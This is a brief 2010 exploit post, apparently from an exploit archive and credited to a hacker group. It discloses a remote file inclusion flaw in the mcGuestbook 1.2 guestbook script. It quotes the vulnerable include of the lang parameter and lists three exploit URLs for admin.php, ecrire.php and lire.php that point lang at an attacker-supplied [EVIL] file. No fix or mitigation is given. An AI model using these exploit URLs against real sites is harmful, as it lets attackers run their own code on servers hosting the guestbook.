mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability
Posted on 12 March 2010
========================================================== mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability ========================================================== ###################################### mcGuestbook 1.2 (lang) Remote File Inclusion Vulnerability ###################################### [~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,| [~] HOME : www.Real-Hack.net | )(_o/ o_)( | [~] Email : Ghost-r00t_at_Hotmail.com |/ / | [~] Script : mcGuestbook 1.2 [~] Download Script : http://www.phpbank.net/admin/download.php?id=155 ############# [ I love the Messenger of Allah Mohammad ] ############# [~] Error ( admin.php + ecrire.php + lire.php ) : include "$lang"; [~] Exploit : http://xxxx/[Path]/ecrire.php?lang=[EVIL] http://xxxx/[Path]/admin.php?lang=[EVIL] http://xxxx/[Path]/lire.php?lang=[EVIL] ############################## # ~ - [ [ : Inj3ct0r : ] ]
